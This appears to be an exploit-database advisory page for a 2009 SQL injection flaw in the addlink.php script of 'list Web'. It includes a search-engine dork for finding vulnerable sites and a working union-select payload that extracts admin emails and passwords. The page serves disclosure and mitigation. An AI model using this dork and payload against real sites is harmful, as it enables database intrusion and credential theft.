list Web (addlink.php id) Remote SQL Injection Vulnerability

vendor:

list Web

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: list Web

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

list Web (addlink.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the list Web addlink.php script, which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is triggered when an attacker sends a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This can be exploited to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

|
|  list Web  (addlink.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM<http://WwW.IQ-ty.CoM>
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://maker.ir
|
| DorK   : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="
|___________________________________________________|

Exploit:
________


www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--

IQ-SecuritY FoRuM